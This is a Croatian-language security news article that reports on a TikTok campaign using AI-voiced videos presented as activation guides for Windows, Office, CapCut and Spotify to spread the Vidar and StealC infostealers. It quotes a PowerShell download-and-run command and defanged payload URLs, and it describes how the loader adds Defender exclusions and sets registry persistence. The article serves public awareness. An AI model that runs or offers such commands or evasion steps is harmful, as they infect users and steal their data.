TikTok upozorenje: Pazite na piratske aplikacije u popularnim video snimcima, šire malver koji krade podatke

Kibernetički kriminalci su otkrili novi način širenja zlonamjernog softvera iskorištavanjem ogromne baze korisnika i algoritamskog dosega TikToka.

Pojavila se sofisticirana kampanja društvenog inženjeringa koja koristi videozapise generirane umjetnom inteligencijom kako bi navela korisnike da preuzmu opasan zlonamjerni softver za krađu informacija, prerušen u vodiče za aktivaciju softvera.

Ovi obmanjujući videozapisi obećavaju pomoć korisnicima pri aktiviranju legitimnih aplikacija kao što su Windows OS, Microsoft Office, CapCut i Spotify, ali umjesto toga isporučuju poznate info-stealere Vidar i StealC nesuđenim žrtvama.

Ova kampanja predstavlja značajan napredak u taktici distribucije zlonamjernog softvera, udaljavajući se od tradicionalnih metoda isporuke putem interneta kako bi iskoristila povjerenje i angažman koji su inherentni platformama društvenih medija.

Za razliku od uobičajenih napada koji se oslanjaju na zlonamjerne web-stranice ili phishing putem e-pošte, ova operacija ugrađuje sve elemente društvenog inženjeringa izravno u video sadržaj, čineći detekciju znatno težom za sigurnosna rješenja.

Kriminalci iskorištavaju viralnu prirodu TikToka; jedan zlonamjerni videozapis je prikupio gotovo 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, demonstrirajući zabrinjavajući doseg i učinkovitost kampanje.

Analitičari Trend Micro-a identificirali su više TikTok računa uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, od kojih su svi od tada deaktivirani.

Istraživači su primijetili da su ovi računi objavljivali izrazito slične videozapise bez lica s glasovima generiranim umjetnom inteligencijom, što sugerira automatizirani proizvodni proces dizajniran za skalabilnost.

Tehnička sofisticiranost napada postaje očita u njegovoj metodologiji izvršenja.

Žrtve dobivaju upute da otvore PowerShell i izvrše naizgled bezopasan naredbu: iex (irm hxxps://allaivo[.]me/spotify). Ovaj PowerShell skript pokreće višestupanjski proces infekcije koji demonstrira napredne tehnike izbjegavanja.

Mehanizam infekcije i taktike postojanosti
Lanac infekcije zlonamjernog softvera otkriva pažljivo orkestrirane korake dizajnirane da osiguraju uspješnu kompromitaciju uz izbjegavanje detekcije.

Po izvršenju, početni PowerShell skript stvara skrivene direktorije unutar korisnikovih APPDATA i LOCALAPPDATA mapa, odmah dodajući te lokacije na popis iznimaka za Windows Defender kako bi se spriječilo skeniranje antivirusnim programima.

Skript zatim preuzima primarni teret s adrese hxxps://amssh[.]co/file.exe, koji sadrži varijante Vidar ili StealC zlonamjernog softvera.

Mehanizam postojanosti uključuje preuzimanje dodatnog PowerShell skripta s adrese hxxps://amssh[.]co/script[.]ps1 i uspostavljanje ključa registra koji osigurava izvršavanje zlonamjernog softvera pri pokretanju sustava.

Značajno je da Vidar koristi inovativnu strategiju zapovijedanja i upravljanja, zloupotrebljavajući legitimne usluge poput Steam profila i Telegram kanala kao Dead Drop Resolvere kako bi sakrio stvarne adrese C&C servera, čineći napore detekcije i uklanjanja znatno složenijim.

Recent Articles

spot_img

Related Stories